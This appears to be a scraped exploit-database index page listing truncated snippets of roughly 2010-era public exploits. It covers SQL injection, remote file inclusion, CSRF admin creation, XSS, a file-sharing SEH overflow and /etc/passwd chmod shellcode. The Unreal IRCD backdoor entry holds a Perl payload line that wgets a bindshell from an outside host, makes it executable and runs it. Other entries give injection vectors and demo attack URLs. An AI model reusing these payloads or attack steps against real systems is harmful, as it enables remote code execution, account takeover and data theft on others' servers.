Nakid CMS Remote Shell Upload

Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : Inj3ct0r.com 0 1 + Support e-mail : submitatinj3ct0r.com 1 0 0 1 1 0 I'm eidelweiss member from Inj3ct0r Team 1 1 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Developers:...

PenPals - Authentication Bypass

PenPals - Authentication Bypass Author: L0rd CrusAd3r aka VSN [email protected] Exploit Title: PenPals Authentication Bypass Vendor url:http://www.anblik.com Version:1.0 Price:1200$ Published: 2010-06-17 Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to all ICW members...

DDLCMS v2. 1 Remote File inclusion vulnerability-vulnerability warning-the black bar safety net

DDLCMS v2. 1 program thanks. php page there is a remote file inclusion vulnerability Vulnerability file:thanks.php Code: includeWWWROOT . 'skins/' . $skin . '/header.php'; // line 46 includeWWWROOT . 'leftside.php'; Poc: the"skin" parameter in FILE thanks.php is not Defined which can allow remote...

Planet 1.1 - Cross-Site Request Forgery (Add Admin)

Exploit Title: Planet 1.1 - CSRF Add Admin Account Date: 17-06-2010 Author: G0D-F4Th3r Software Link: http://php.femtolayer.com/planet11/ Version: 1.1 Tested on: http://php.femtolayer.com/planet11/ /cp/security.php?do=admins" Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And A...

File Sharing Wizard 1.5.0 - Remote Overflow (SEH)

!/usr/bin/python print "\n" print " Team Hackers Garage " print " www.garage4hackers.com " print " " print " File Sharing Wizard Version 1.5.0 " print " Remote Command Execution " print " Author: b0nd " print " [email protected] " print " " print " Greetz to: The Hackers Garage Family " print ...

Real Estate - SQL Injection

Real Estate - SQL Injection Description Linux And window Version available: This software is available in both windows and linux version. It runs on asp and php extension. Listings: We can add unlimited property listing, with the property photo. System automatically creates three thumbnail photo ...

Unreal IRCD 3.2.8.1 Remote Download / Execute Trojan

!/usr/bin/perl Unreal3.2.8.1 Remote Downloader/Execute Trojan DO NOT DISTRIBUTE -PRIVATE- -iHaq 2l8 use Socket; use IO::Socket; Payload options my $payload1 = 'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &'; my...

Unreal IRCD 3.2.8.1 Remote Downloader/Execute Trojan

Exploit for linux platform in category remote exploits ==================================================== Unreal IRCD 3.2.8.1 Remote Downloader/Execute Trojan ==================================================== !/usr/bin/perl Unreal3.2.8.1 Remote Downloader/Execute Trojan DO NOT DISTRIBUTE...

HauntmAx CMS Haunted House - Directory Listing SQL Injection

HauntmAx CMS Haunted House - Directory Listing SQL Injection ================================== HauntmAx CMS SQLi Vulnerability ================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1...

Hotel Resort Site Script with OnLine Reservation System - SQL Injection

Hotel Resort Site Script with OnLine Reservation System - SQL Injection Author: L0rd CrusAd3r aka VSN [email protected] Exploit Title:Hotel / Resort Site Script with OnLine Reservation System SQLi Vulnerable Published: 2010-06-08 Vendor url:http://www.mformula.com.br Greetz to:Sid3^effects,...

Image Store - Arbitrary File Upload

Image Store - Arbitrary File Upload ============================================= =================================== ============================================= ====== Image Store Remote file Upload Vulnerability ============================================= ===================================...

linux/x86 sys_chmod("/etc/passwd",599) shellcode 39 bytes

Exploit for linux/x86 platform in category shellcode ========================================================= linux/x86 syschmod"/etc/passwd",599 shellcode 39 bytes ========================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 ...

dutch Book php - Remote file inclusion

Exploit for php platform in category web applications ====================================== dutch Book php - Remote file inclusion ====================================== dutch Book php - Remote file inclusion Author: Poltergeisth4cker Team: Inj3ct0r Team inj3ct0r.com Contact: email protected...

Lots XSS of Dvbbs Version 2.0++

No description provided by source. Dvbbs Version 2.0++ is the latest version of dvbbs. it has lots of xss. The Parameters:boardid、action、location、TopicDate、TopicOrder、TopicDA、orders、oper The...

JV2 Folder Gallery 3.1 - gallery.php Remote File Inclusion

JV2 Folder Gallery 3.1 - gallery.php Remote File Inclusion ----------------------oOO------OOo----------------------- | | | / / / / | | / / / / / / / / / / / | | // // / / / // / // / // | | ///,// /./,/, // | | Security Sn!pEr.S!Te // 2o1o |...

Renista CMS - SQL Injection

Author:Amir Afghanian Discovered by :Amir Afghanian My Email: [email protected] my Y!ID: AmirCoder My Home page : www.shabgard.org My Nice name : TakFanar ============ Renista CMS BUG Only For NOTIFICATION ================== Test on CMS Owner site :http://www.rayaco.com db name :...

Uniform Server 5.6.5 Cross Site Request Forgery

!--========================================================================================================= //\ /\ /\ /\ /\ /\ ///\ //\ /\ /\///\ // \ // //\ \ / //\ \ / // //\ \ /\\ \ \ \ / / / / // \ \ // // // // \ // //\ \\ \ // /// \ \ / \ / // / // / / / / / \ \ / / /...

TS Special Edition 7.0 - Multiple Vulnerabilities

TS Special Edition 3.2 javascript:TSQuickRate'torrent1', 'CHAGEYOURIDHERE'; 4 Apply changes and vote the torrent every time you want...

SiteServer CMS多处跨站漏洞

SiteServer CMS 是基于微软.NET 平台开发的网站内容管理系统，它集成了内容发布管理、多站点管理、定时内容采集、定时生成、多服务器发布、搜索引擎优化、流量统计等多项强大功能，独创的 STL 模板语言，通过Dreamweaver 可视化插件能够任意编辑页面显示样式，生成纯静态页面。 1.注册页面为过滤用户提交非法参数导致跨站，插入跨站语句即可： demo:http://demo.siteserver.cn/usercenter/register.aspx?ReturnUrl=%22%3E%3Ciframe%20src=%22http://www.zhuba.net%22%3E...

动网(DVbbs) Ver 8.3.0 多个跨站漏洞

动网论坛做为目前国内最大的社区论坛软件服务提供商，依靠其强大的功能、非凡的访问速度和负载能力、友好方便的客户操作界面、优质的客户服务、国内领先的 技术和强大而持续的产品研发并保持不断创新的能力，动网所提供的动网社区论坛产品已经占据了国内社区论坛产品使用比例的70%以上。 目标网站对用户提交的变量代码未进行有效的过滤或转换，允许攻击者插入恶意WEB代码。 此版本新存在两处跨站漏洞 DVbbs Version 8.3.0 等待官方补丁 demo1:...